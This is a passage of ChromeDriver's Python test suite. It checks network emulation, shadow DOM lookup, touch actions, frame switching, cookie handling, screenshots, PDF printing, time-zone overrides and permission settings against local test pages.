throughput_kbps * 1.5) self.assertGreaterEqual(actual_throughput_kbps, throughput_kbps / 1.5) def testEmulateNetworkConditionsNameSpeed(self): # Warm up the browser. self._http_server.SetDataForPath( '/', "<html><body>blank</body></html>") self._driver.Load(self._http_server.GetUrl() + '/') # DSL: 2Mbps throughput, 5ms RTT throughput_kbps = 2048 throughput = throughput_kbps * 1024 self._driver.SetNetworkConditionsName('DSL') _32_bytes = " 0 1 2 3 4 5 6 7 8 9 A B C D E F" _1_megabyte = _32_bytes * 32768 self._http_server.SetDataForPath( '/1MB', "<html><body>%s</body></html>" % _1_megabyte) start = monotonic() self._driver.Load(self._http_server.GetUrl() + '/1MB') finish = monotonic() duration = finish - start actual_throughput_kbps = 1024 / duration self.assertLessEqual(actual_throughput_kbps, throughput_kbps * 1.5) self.assertGreaterEqual(actual_throughput_kbps, throughput_kbps / 1.5) def testEmulateNetworkConditionsOffline(self): # A workaround for crbug.com/177511; when setting offline, the throughputs # must be 0. self._driver.SetNetworkConditions(0, 0, 0, offline=True) self.assertRaises(chromedriver.ChromeDriverException, self._driver.Load, self.GetHttpUrlForFile('/chromedriver/page_test.html')) # The "X is not available" title is set after the page load event fires, so # we have to explicitly wait for this to change. We can't rely on the # navigation tracker to block the call to Load() above. self.WaitForCondition(lambda: 'is not available' in self._driver.GetTitle()) def testSendCommandAndGetResult(self): """Sends a custom command to the DevTools debugger and gets the result""" self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html')) params = {} document = self._driver.SendCommandAndGetResult('DOM.getDocument', params) self.assertTrue('root' in document) def _FindElementInShadowDom(self, css_selectors): """Find an element inside shadow DOM using CSS selectors. The last item in css_selectors identify the element to find. All preceding selectors identify the hierarchy of shadow hosts to traverse in order to reach the target shadow DOM.""" current = None for selector in css_selectors: if current is None: # First CSS selector, start from root DOM. current = self._driver else: # current is a shadow host selected previously. # Enter the corresponding shadow root. current = self._driver.ExecuteScript( 'return arguments[0].shadowRoot', current) current = current.FindElement('css selector', selector) return current def testShadowDomFindElement(self): """Checks that chromedriver can find elements in a shadow DOM.""" self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_dom_test.html')) self.assertTrue(self._FindElementInShadowDom( ["#innerDiv", "#parentDiv", "#textBox"])) def testShadowDomFindChildElement(self): """Checks that chromedriver can find child elements from a shadow DOM element.""" self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_dom_test.html')) elem = self._FindElementInShadowDom( ["#innerDiv", "#parentDiv", "#childDiv"]) self.assertTrue(elem.FindElement("css selector", "#textBox")) def testShadowDomFindElementFailsFromRoot(self): """Checks that chromedriver can't find elements in a shadow DOM from root.""" self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_dom_test.html')) # can't find element from the root without /deep/ with self.assertRaises(chromedriver.NoSuchElement): self._driver.FindElement("css selector", "#textBox") def testShadowDomText(self): """Checks that chromedriver can find extract the text from a shadow DOM element.""" self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_dom_test.html')) elem = self._FindElementInShadowDom( ["#innerDiv", "#parentDiv", "#heading"]) self.assertEqual("Child", elem.GetText()) def testShadowDomSendKeys(self): """Checks that chromedriver can call SendKeys on a shadow DOM element.""" self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_dom_test.html')) elem = self._FindElementInShadowDom( ["#innerDiv", "#parentDiv", "#textBox"]) elem.SendKeys("bar") self.assertEqual("foobar", self._driver.ExecuteScript( 'return arguments[0].value;', elem)) def testShadowDomClear(self): """Checks that chromedriver can call Clear on a shadow DOM element.""" self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_dom_test.html')) elem = self._FindElementInShadowDom( ["#innerDiv", "#parentDiv", "#textBox"]) elem.Clear() self.assertEqual("", self._driver.ExecuteScript( 'return arguments[0].value;', elem)) def testShadowDomClick(self): """Checks that chromedriver can call Click on an element in a shadow DOM.""" self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_dom_test.html')) # Wait for page to stabilize. See https://crbug.com/954553#c7 time.sleep(1) elem = self._FindElementInShadowDom( ["#innerDiv", "#parentDiv", "#button"]) elem.Click() # the button's onClicked handler changes the text box's value self.assertEqual("Button Was Clicked", self._driver.ExecuteScript( 'return arguments[0].value;', self._FindElementInShadowDom(["#innerDiv", "#parentDiv", "#textBox"]))) def testShadowDomActionClick(self): '''Checks that ChromeDriver can use actions API to click on an element in a shadow DOM.''' self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_dom_test.html')) # Wait for page to stabilize. See https://crbug.com/954553#c7 time.sleep(1) elem = self._FindElementInShadowDom( ['#innerDiv', '#parentDiv', '#button']) actions = ({'actions': [{ 'type': 'pointer', 'actions': [{'type': 'pointerMove', 'x': 0, 'y': 0, 'origin': elem}, {'type': 'pointerDown', 'button': 0}, {'type': 'pointerUp', 'button': 0}], 'id': 'pointer1'}]}) self._driver.PerformActions(actions) # the button's onClicked handler changes the text box's value self.assertEqual('Button Was Clicked', self._driver.ExecuteScript( 'return arguments[0].value;', self._FindElementInShadowDom(['#innerDiv', '#parentDiv', '#textBox']))) def testShadowDomStaleReference(self): """Checks that trying to manipulate shadow DOM elements that are detached from the document raises a StaleElementReference exception""" self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_dom_test.html')) elem = self._FindElementInShadowDom( ["#innerDiv", "#parentDiv", "#button"]) self._driver.ExecuteScript( 'document.querySelector("#outerDiv").innerHTML="<div/>";') with self.assertRaises(chromedriver.StaleElementReference): elem.Click() def testTouchDownMoveUpElement(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/touch_action_tests.html')) target = self._driver.FindElement('css selector', '#target') location = target.GetLocation() self._driver.TouchDown(location['x'], location['y']) events = self._driver.FindElement('css selector', '#events') self.assertEquals('events: touchstart', events.GetText()) self._driver.TouchMove(location['x'] + 1, location['y'] + 1) self.assertEquals('events: touchstart touchmove', events.GetText()) self._driver.TouchUp(location['x'] + 1, location['y'] + 1) self.assertEquals('events: touchstart touchmove touchend', events.GetText()) def testGetElementRect(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/absolute_position_element.html')) target = self._driver.FindElement('css selector', '#target') rect = target.GetRect() self.assertEquals(18, rect['x']) self.assertEquals(10, rect['y']) self.assertEquals(200, rect['height']) self.assertEquals(210, rect['width']) def testTouchFlickElement(self): dx = 3 dy = 4 speed = 5 flickTouchEventsPerSecond = 30 moveEvents = int( math.sqrt(dx * dx + dy * dy) * flickTouchEventsPerSecond / speed) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) div = self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.addEventListener("touchstart", function() {' ' div.innerHTML = "preMove0";' '});' 'div.addEventListener("touchmove", function() {' ' res = div.innerHTML.match(/preMove(\d+)/);' ' if (res != null) {' ' div.innerHTML = "preMove" + (parseInt(res[1], 10) + 1);' ' }' '});' 'div.addEventListener("touchend", function() {' ' if (div.innerHTML == "preMove' + str(moveEvents) + '") {' ' div.innerHTML = "new<br>";' ' }' '});' 'return div;') self._driver.TouchFlick(div, dx, dy, speed) self.assertEquals(1, len(self._driver.FindElements('tag name', 'br'))) def testSwitchesToTopFrameAfterNavigation(self): self._driver.Load('about:blank') self._driver.Load(self.GetHttpUrlForFile('/chromedriver/outer.html')) frame = self._driver.FindElement('tag name', 'iframe') self._driver.SwitchToFrame(frame) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/outer.html')) p = self._driver.FindElement('tag name', 'p') self.assertEquals('Two', p.GetText()) def testSwitchesToTopFrameAfterRefresh(self): self._driver.Load('about:blank') self._driver.Load(self.GetHttpUrlForFile('/chromedriver/outer.html')) frame = self._driver.FindElement('tag name', 'iframe') self._driver.SwitchToFrame(frame) self._driver.Refresh() p = self._driver.FindElement('tag name', 'p') self.assertEquals('Two', p.GetText()) def testSwitchesToTopFrameAfterGoingBack(self): self._driver.Load('about:blank') self._driver.Load(self.GetHttpUrlForFile('/chromedriver/outer.html')) frame = self._driver.FindElement('tag name', 'iframe') self._driver.SwitchToFrame(frame) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/inner.html')) self._driver.GoBack() p = self._driver.FindElement('tag name', 'p') self.assertEquals('Two', p.GetText()) def testCanSwitchToPrintPreviewDialog(self): old_handles = self._driver.GetWindowHandles() print >> sys.stdout, "Test debug: actual len of old_handles: " \ + str(len(old_handles)) self.assertEquals(1, len(old_handles)) self._driver.ExecuteScript('setTimeout(function(){window.print();}, 0);') new_window_handle = self.WaitForNewWindow(self._driver, old_handles) if new_window_handle is None: print >> sys.stdout, "Test debug: new_window_handle is None" else: print >> sys.stdout, "Test debug: new_window_handle is not None" self.assertNotEqual(None, new_window_handle) self._driver.SwitchToWindow(new_window_handle) print >> sys.stdout, "Test debug: actual GetCurrentUrl: " \ + self._driver.GetCurrentUrl() self.assertEquals('chrome://print/', self._driver.GetCurrentUrl()) def testCanClickInIframes(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/nested.html')) a = self._driver.FindElement('tag name', 'a') a.Click() frame_url = self._driver.ExecuteScript('return window.location.href') self.assertTrue(frame_url.endswith('#one')) frame = self._driver.FindElement('tag name', 'iframe') self._driver.SwitchToFrame(frame) a = self._driver.FindElement('tag name', 'a') a.Click() frame_url = self._driver.ExecuteScript('return window.location.href') self.assertTrue(frame_url.endswith('#two')) def testDoesntHangOnFragmentNavigation(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html#x')) def SetCookie(self, request): return {'Set-Cookie': 'x=y; HttpOnly'}, "<!DOCTYPE html><html></html>" def testGetHttpOnlyCookie(self): self._http_server.SetCallbackForPath('/setCookie', self.SetCookie) self._driver.Load(self.GetHttpUrlForFile('/setCookie')) self._driver.AddCookie({'name': 'a', 'value': 'b'}) cookies = self._driver.GetCookies() self.assertEquals(2, len(cookies)) for cookie in cookies: self.assertIn('name', cookie) if cookie['name'] == 'a': self.assertFalse(cookie['httpOnly']) elif cookie['name'] == 'x': self.assertTrue(cookie['httpOnly']) else: self.fail('unexpected cookie: %s' % json.dumps(cookie)) def testCookiePath(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/long_url/empty.html')) self._driver.AddCookie({'name': 'a', 'value': 'b'}) self._driver.AddCookie({ 'name': 'x', 'value': 'y', 'path': '/chromedriver/long_url'}) cookies = self._driver.GetCookies() self.assertEquals(2, len(cookies)) for cookie in cookies: self.assertIn('path', cookie) if cookie['name'] == 'a': self.assertEquals('/' , cookie['path']) if cookie['name'] == 'x': self.assertEquals('/chromedriver/long_url' , cookie['path']) def testGetNamedCookie(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/empty.html')) self._driver.AddCookie({'name': 'a', 'value': 'b'}) named_cookie = self._driver.GetNamedCookie('a') self.assertEquals('a' , named_cookie['name']) self.assertEquals('b' , named_cookie['value']) self.assertRaisesRegexp( chromedriver.NoSuchCookie, "no such cookie", self._driver.GetNamedCookie, 'foo') def testDeleteCookie(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/empty.html')) self._driver.AddCookie({'name': 'a', 'value': 'b'}) self._driver.AddCookie({'name': 'x', 'value': 'y'}) self._driver.AddCookie({'name': 'p', 'value': 'q'}) cookies = self._driver.GetCookies() self.assertEquals(3, len(cookies)) self._driver.DeleteCookie('a') self.assertEquals(2, len(self._driver.GetCookies())) self._driver.DeleteAllCookies() self.assertEquals(0, len(self._driver.GetCookies())) def testCookieForFrame(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/cross_domain_iframe.html')) self._driver.AddCookie({'name': 'outer', 'value': 'main context'}) frame = self._driver.FindElement('tag name', 'iframe') self._driver.SwitchToFrame(frame) self.assertTrue(self.WaitForCondition( lambda: 'outer.html' in self._driver.ExecuteScript('return window.location.href'))) self._driver.AddCookie({'name': 'inner', 'value': 'frame context'}) cookies = self._driver.GetCookies() self.assertEquals(1, len(cookies)) self.assertEquals('inner', cookies[0]['name']) self._driver.SwitchToMainFrame() cookies = self._driver.GetCookies() self.assertEquals(1, len(cookies)) self.assertEquals('outer', cookies[0]['name']) def testCanClickAlertInIframes(self): # This test requires that the page be loaded from a file:// URI, rather than # the test HTTP server. path = os.path.join(chrome_paths.GetTestData(), 'chromedriver', 'page_with_frame.html') url = 'file://' + urllib.pathname2url(path) self._driver.Load(url) frame = self._driver.FindElement('css selector', '#frm') self._driver.SwitchToFrame(frame) a = self._driver.FindElement('css selector', '#btn') a.Click() self.WaitForCondition(lambda: self._driver.IsAlertOpen()) self._driver.HandleAlert(True) def testThrowErrorWithExecuteScript(self): self.assertRaisesRegexp( chromedriver.JavaScriptError, "some error", self._driver.ExecuteScript, 'throw new Error("some error")') def testDoesntCrashWhenScriptLogsUndefinedValue(self): # https://bugs.chromium.org/p/chromedriver/issues/detail?id=1547 self._driver.ExecuteScript('var b; console.log(b);') def testDoesntThrowWhenPageLogsUndefinedValue(self): # https://bugs.chromium.org/p/chromedriver/issues/detail?id=1547 self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/log_undefined_value.html')) def testCanSetCheckboxWithSpaceKey(self): self._driver.Load('about:blank') self._driver.ExecuteScript( "document.body.innerHTML = '<input type=\"checkbox\">';") checkbox = self._driver.FindElement('tag name', 'input') self.assertFalse( self._driver.ExecuteScript('return arguments[0].checked', checkbox)) checkbox.SendKeys(' ') self.assertTrue( self._driver.ExecuteScript('return arguments[0].checked', checkbox)) def testElementReference(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/element_ref.html')) element = self._driver.FindElement('css selector', '#link') self._driver.FindElements('tag name', 'br') w3c_id_length = 36 if (self._driver.w3c_compliant): self.assertEquals(len(element._id), w3c_id_length) def testFindElementWhenElementIsOverridden(self): self._driver.Load('about:blank') self._driver.ExecuteScript( 'document.body.appendChild(document.createElement("a"));') self._driver.ExecuteScript('window.Element = {}') self.assertEquals(1, len(self._driver.FindElements('tag name', 'a'))) def testExecuteScriptWhenObjectPrototypeIsModified(self): # Some JavaScript libraries (e.g. MooTools) do things like this. For context # see https://bugs.chromium.org/p/chromedriver/issues/detail?id=1521 self._driver.Load('about:blank') self._driver.ExecuteScript('Object.prototype.$family = undefined;') self.assertEquals(1, self._driver.ExecuteScript('return 1;')) def testWebWorkerFrames(self): """Verify web worker frames are handled correctly. Regression test for bug https://bugs.chromium.org/p/chromedriver/issues/detail?id=2340. The bug was triggered by opening a page with web worker, and then opening a page on a different site. We simulate a different site by using 'localhost' as the host name (default is '127.0.0.1'). """ self._driver.Load(self.GetHttpUrlForFile('/chromedriver/web_worker.html')) self._driver.Load(self._http_server.GetUrl('localhost') + '/chromedriver/empty.html') def testWaitForCurrentFrameToLoad(self): """Verify ChromeDriver waits for loading events of current frame Regression test for bug https://bugs.chromium.org/p/chromedriver/issues/detail?id=3164 Clicking element in frame triggers reload of that frame, click should not return until loading is complete. """ def waitAndRespond(): # test may not detect regression without small sleep. # locally, .2 didn't fail before code change, .3 did time.sleep(.5) self._sync_server.RespondWithContent( """ <html> <body> <p id='valueToRead'>11</p> </body> </html> """) self._http_server.SetDataForPath('/page10.html', """ <html> <head> <title> Frame </title> <script> function reloadWith(i) { window.location.assign('%s'); } </script> </head> <body> <button id='prev' onclick="reloadWith(9)">-1</button> <button id='next' onclick="reloadWith(11)">+1</button> <p id='valueToRead'>10</p> </body> </html> """ % self._sync_server.GetUrl()) self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/page_for_next_iframe.html')) frame = self._driver.FindElement('tag name', 'iframe') self._driver.SwitchToFrame(frame); thread = threading.Thread(target=waitAndRespond) thread.start() self._driver.FindElement('css selector', '#next').Click() value_display = self._driver.FindElement('css selector', '#valueToRead') self.assertEquals('11', value_display.GetText()) def testSlowIFrame(self): """Verify ChromeDriver does not wait for slow frames to load. Regression test for bugs https://bugs.chromium.org/p/chromedriver/issues/detail?id=2198 and https://bugs.chromium.org/p/chromedriver/issues/detail?id=2350. """ def waitAndRespond(): # Send iframe contents slowly time.sleep(2) self._sync_server.RespondWithContent( '<html><div id=iframediv>IFrame contents</div></html>') self._http_server.SetDataForPath('/top.html', """ <html><body> <div id='top'> <input id='button' type="button" onclick="run()" value='Click'> </div> <script> function run() { var iframe = document.createElement('iframe'); iframe.id = 'iframe'; iframe.setAttribute('src', '%s'); document.body.appendChild(iframe); } </script> </body></html>""" % self._sync_server.GetUrl()) self._driver.Load(self._http_server.GetUrl() + '/top.html') thread = threading.Thread(target=waitAndRespond) thread.start() start = monotonic() # Click should not wait for frame to load, so elapsed time from this # command should be < 2 seconds. self._driver.FindElement('css selector', '#button').Click() self.assertLess(monotonic() - start, 2.0) frame = self._driver.FindElement('css selector', '#iframe') # WaitForPendingNavigations examines the load state of the current frame # so ChromeDriver will wait for frame to load after SwitchToFrame # start is reused because that began the pause for the frame load self._driver.SwitchToFrame(frame) self.assertGreaterEqual(monotonic() - start, 2.0) self._driver.FindElement('css selector', '#iframediv') thread.join() @staticmethod def MakeRedImageTestScript(png_data_in_base64): """Used by the takeElementScreenshot* tests to load the PNG image via a data URI, analyze it, and PASS/FAIL depending on whether all the pixels are all rgb(255,0,0).""" return ( """ const resolve = arguments[arguments.length - 1]; const image = new Image(); image.onload = () => { var canvas = document.createElement('canvas'); canvas.width = image.width; canvas.height = image.height; var context = canvas.getContext('2d'); context.drawImage(image, 0, 0); const pixels = context.getImageData(0, 0, image.width, image.height).data; for (let i = 0; i < pixels.length; i += 4) { if (pixels[i + 0] != 255 || // Red pixels[i + 1] != 0 || // Green pixels[i + 2] != 0) { // Blue const message = ( 'FAIL: Bad pixel rgb(' + pixels.slice(i, i + 3).join(',') + ') at offset ' + i + ' from ' + image.src); // "Disabled" on Mac 10.10: 1/15 test runs produces an incorrect // pixel. Since no later Mac version, nor any other platform, // exhibits this problem, we assume this is due to a bug in this // specific version of Mac OS. So, just log the error and pass // the test. http://crbug.com/913603 if (navigator.userAgent.indexOf('Mac OS X 10_10') != -1) { console.error(message); console.error('Passing test due to Mac 10.10-specific bug.'); resolve('PASS'); } else { resolve(message); } return; } } resolve('PASS'); }; image.src = 'data:image/png;base64,%s'; """ % png_data_in_base64.replace("'", "\\'")) def takeScreenshotAndVerifyCorrect(self, element): """ Takes screenshot of given element and returns 'PASS' if all pixels in screenshot are rgb(255, 0, 0) and 'FAIL' otherwise """ elementScreenshotPNGBase64 = element.TakeElementScreenshot() self.assertIsNotNone(elementScreenshotPNGBase64) return self._driver.ExecuteAsyncScript( ChromeDriverTest.MakeRedImageTestScript(elementScreenshotPNGBase64)) def testTakeElementScreenshot(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/page_with_redbox.html')) analysisResult = 'FAIL' redElement = self._driver.FindElement('css selector', '#box') analysisResult = self.takeScreenshotAndVerifyCorrect(redElement) self.assertEquals('PASS', analysisResult) def testTakeElementScreenshotInIframe(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/page_with_iframe_redbox.html')) frame = self._driver.FindElement('css selector', '#frm') self._driver.SwitchToFrame(frame) analysisResult = 'FAIL' redElement = self._driver.FindElement('css selector', '#box') analysisResult = self.takeScreenshotAndVerifyCorrect(redElement) self.assertEquals('PASS', analysisResult) def testTakeLargeElementScreenshot(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/large_element.html')) self._driver.SetWindowRect(500, 500, 0, 0) # Wait for page to stabilize. See https://crbug.com/chromedriver/2986 time.sleep(1) redElement = self._driver.FindElement('css selector', '#A') analysisResult = self.takeScreenshotAndVerifyCorrect(redElement) self.assertEquals('PASS', analysisResult) @staticmethod def png_dimensions(png_data_in_base64): image = base64.b64decode(png_data_in_base64) width, height = struct.unpack('>LL', image[16:24]) return int(width), int(height) def testTakeLargeElementViewportScreenshot(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/large_element.html')) self._driver.SetWindowRect(640, 400, 0, 0) # Wait for page to stabilize. See https://crbug.com/chromedriver/2986 time.sleep(1) viewportScreenshotPNGBase64 = self._driver.TakeScreenshot() self.assertIsNotNone(viewportScreenshotPNGBase64) mime_type = imghdr.what('', base64.b64decode(viewportScreenshotPNGBase64)) self.assertEqual('png', mime_type) image_width, image_height = self.png_dimensions(viewportScreenshotPNGBase64) viewport_width, viewport_height = self._driver.ExecuteScript( ''' const {devicePixelRatio, innerHeight, innerWidth} = window; return [ Math.floor(innerWidth * devicePixelRatio), Math.floor(innerHeight * devicePixelRatio) ]; ''') self.assertEquals(image_width, viewport_width) self.assertEquals(image_height, viewport_height) def testTakeLargeElementFullPageScreenshot(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/large_element.html')) width = 640 height = 400 self._driver.SetWindowRect(width, height, 0, 0) # Wait for page to stabilize. See https://crbug.com/chromedriver/2986 time.sleep(1) fullpageScreenshotPNGBase64 = self._driver.TakeFullPageScreenshot() self.assertIsNotNone(fullpageScreenshotPNGBase64) mime_type = imghdr.what('', base64.b64decode(fullpageScreenshotPNGBase64)) self.assertEqual('png', mime_type) image_width, image_height = self.png_dimensions(fullpageScreenshotPNGBase64) # According to https://javascript.info/size-and-scroll-window, # width/height of the whole document, with the scrolled out part page_width, page_height = self._driver.ExecuteScript( ''' const body = document.body; const doc = document.documentElement; const width = Math.max(body.scrollWidth, body.offsetWidth,\ body.clientWidth, doc.scrollWidth,\ doc.offsetWidth, doc.clientWidth); const height = Math.max(body.scrollHeight, body.offsetHeight,\ body.clientHeight, doc.scrollHeight,\ doc.offsetHeight, doc.clientHeight); return [ width, height ]; ''') self.assertEquals(image_width, page_width) self.assertEquals(image_height, page_height) # Assert Window Rect size stay the same after taking fullpage screenshot size = self._driver.GetWindowRect() self.assertEquals(size[0], width) self.assertEquals(size[1], height) # Verify scroll bars presence after test horizontal_scroll_bar, vertical_scroll_bar = self._driver.ExecuteScript( ''' const doc = document.documentElement; return [ doc.scrollWidth > doc.clientWidth, doc.scrollHeight > doc.clientHeight ]; ''') self.assertEquals(horizontal_scroll_bar, True) self.assertEquals(vertical_scroll_bar, True) def testPrint(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) pdf = self._driver.PrintPDF({ 'orientation': 'landscape', 'scale': 1.1, 'margin': { 'top': 1.1, 'bottom': 2.2, 'left': 3.3, 'right': 4.4 }, 'background': True, 'shrinkToFit': False, 'pageRanges': [1], 'page': { 'width': 15.6, 'height': 20.6 } }) decoded_pdf = base64.b64decode(pdf) self.assertTrue(decoded_pdf.startswith("%PDF")) self.assertTrue(decoded_pdf.endswith("%%EOF")) def testPrintInvalidArgument(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self.assertRaises(chromedriver.InvalidArgument, self._driver.PrintPDF, {'pageRanges': ['x-y']}) def testGenerateTestReport(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/reporting_observer.html')) self._driver.GenerateTestReport('test report message'); report = self._driver.ExecuteScript('return window.result;') self.assertEquals('test', report['type']); self.assertEquals('test report message', report['body']['message']); def testSetTimeZone(self): defaultTimeZoneScript = ''' return (new Intl.DateTimeFormat()).resolvedOptions().timeZone; '''; localHourScript = ''' return (new Date("2020-10-10T00:00:00Z")).getHours(); '''; self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) # Test to switch to Taipei self._driver.SetTimeZone('Asia/Taipei'); timeZone = self._driver.ExecuteScript(defaultTimeZoneScript) self.assertEquals('Asia/Taipei', timeZone); localHour = self._driver.ExecuteScript(localHourScript) # Taipei time is GMT+8. Not observes DST. self.assertEquals(8, localHour); # Test to switch to Tokyo self._driver.SetTimeZone('Asia/Tokyo'); timeZone = self._driver.ExecuteScript(defaultTimeZoneScript) self.assertEquals('Asia/Tokyo', timeZone); localHour = self._driver.ExecuteScript(localHourScript) # Tokyo time is GMT+9. Not observes DST. self.assertEquals(9, localHour); def GetPermissionWithQuery(self, query): script = """ let query = arguments[0]; let done = arguments[1]; console.log(done); navigator.permissions.query(query) .then(function(value) { done({ status: 'success', value: value && value.state }); }, function(error) { done({ status: 'error', value: error && error.message }); }); """ return self._driver.ExecuteAsyncScript(script, query) def GetPermission(self, name): return self.GetPermissionWithQuery({ 'name': name }) def CheckPermission(self, response, expected_state): self.assertEquals(response['status'], 'success') self.assertEquals(response['value'], expected_state) def testPermissionsOpaqueOriginsThrowError(self): """ Confirms that opaque origins cannot have overrides. """ self._driver.Load("about:blank") self.assertRaises(chromedriver.InvalidArgument, self._driver.SetPermission, {'descriptor': { 'name': 'geolocation' }, 'state': 'denied'}) def testPermissionStates(self): """ Confirms that denied, granted, and prompt can be set. """ self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.SetPermission({ 'descriptor': { 'name': 'geolocation' }, 'state': 'denied' }) self.CheckPermission(self.GetPermission('geolocation'), 'denied') self._driver.SetPermission({ 'descriptor': { 'name': 'geolocation' }, 'state': 'granted' }) self.CheckPermission(self.GetPermission('geolocation'), 'granted') self._driver.SetPermission({ 'descriptor': { 'name': 'geolocation' }, 'state': 'prompt' }) self.CheckPermission(self.GetPermission('geolocation'), 'prompt') def testSettingPermissionDoesNotAffectOthers(self): """ Confirm permissions do not affect unset permissions. """ self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) response = self.GetPermission('geolocation') self.assertEquals(response['status'], 'success') status = response['value'] self._driver.SetPermission({ 'descriptor': { 'name': 'background-sync' }, 'state': 'denied' }) self.CheckPermission(self.GetPermission('background-sync'), 'denied') self.CheckPermission(self.GetPermission('geolocation'), status) def testMultiplePermissions(self): """ Confirms multiple custom permissions can be set simultaneously. """ self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.SetPermission({ 'descriptor': { 'name': 'geolocation' }, 'state': 'denied' }) self._driver.SetPermission({ 'descriptor': { 'name': 'background-fetch' }, 'state': 'prompt' }) self._driver.SetPermission({ 'descriptor': { 'name': 'background-sync' }, 'state': 'granted' }) self.CheckPermission(self.GetPermission('geolocation'), 'denied') self.CheckPermission(self.GetPermission('background-fetch'), 'prompt') self.CheckPermission(self.GetPermission('background-sync'), 'granted') def testSensorPermissions(self): """ Tests sensor permissions. Currently, Chrome controls all sensor permissions (accelerometer, magnetometer, gyroscope, ambient-light-sensor) with the 'sensors' permission. This test demonstrates this internal implementation detail so developers are aware of this behavior. """ self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) parameters = { 'descriptor': { 'name': 'magnetometer' }, 'state': 'granted' } self._driver.SetPermission(parameters) # Light sensor is not enabled by default, so it cannot be queried or set. #self.CheckPermission(self.GetPermission('ambient-light-sensor'), 'granted') self.CheckPermission(self.GetPermission('magnetometer'), 'granted') self.CheckPermission(self.GetPermission('accelerometer'), 'granted') self.CheckPermission(self.GetPermission('gyroscope'), 'granted') parameters = { 'descriptor': { 'name': 'gyroscope' }, 'state': 'denied' } self._driver.SetPermission(parameters) #self.CheckPermission(self.GetPermission('ambient-light-sensor'), 'denied') self.CheckPermission(self.GetPermission('magnetometer'), 'denied') self.CheckPermission(self.GetPermission('accelerometer'), 'denied') self.CheckPermission(self.GetPermission('gyroscope'), 'denied') def testMidiPermissions(self): """ Tests midi permission requirements. MIDI, sysex: true, when granted, should automatically grant regular MIDI permissions. When regular MIDI is denied, this should also imply MIDI with sysex is denied. """ self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) parameters = { 'descriptor': { 'name': 'midi', 'sysex': True }, 'state': 'granted' } self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']), 'granted') parameters['descriptor']['sysex'] = False self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']), 'granted') parameters = { 'descriptor': { 'name': 'midi', 'sysex': False }, 'state': 'denied' } self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']), 'denied') # While this should be denied, Chrome does not do this. # parameters['descriptor']['sysex'] = True should be denied. def testClipboardPermissions(self): """ Tests clipboard permission requirements. clipboard-read with allowWithoutSanitization: true or false, and clipboard-write with allowWithoutSanitization: true are bundled together into one CLIPBOARD_READ_WRITE permission. clipboard write with allowWithoutSanitization: false is an auto-granted permission. """ self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) parameters = { 'descriptor': { 'name': 'clipboard-read' , 'allowWithoutSanitization': False }, 'state': 'granted' } raw_write_parameters = { 'descriptor': { 'name': 'clipboard-write', 'allowWithoutSanitization': True } } self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']), 'prompt') self.CheckPermission(self.GetPermissionWithQuery( raw_write_parameters['descriptor']), 'prompt') self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']), 'granted') parameters['descriptor']['allowWithoutSanitization'] = True self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']), 'granted') parameters['descriptor']['name'] = 'clipboard-write' self.CheckPermission(self.GetPermissionWithQuery(parameters['descriptor']), 'granted') parameters = { 'descriptor': { 'name': 'clipboard-write' }, 'state': 'prompt' } self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermission('clipboard-read'), 'granted') self.CheckPermission(self.GetPermission('clipboard-write'), 'prompt') def testPersistentStoragePermissions(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) parameters = { 'descriptor': { 'name': 'persistent-storage' }, 'state': 'granted' } self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermission('persistent-storage'), 'granted') parameters['state'] = 'denied' self._driver.SetPermission(parameters) self.CheckPermission(self.GetPermission('persistent-storage'), 'denied') def testPushAndNotificationsPermissions(self): 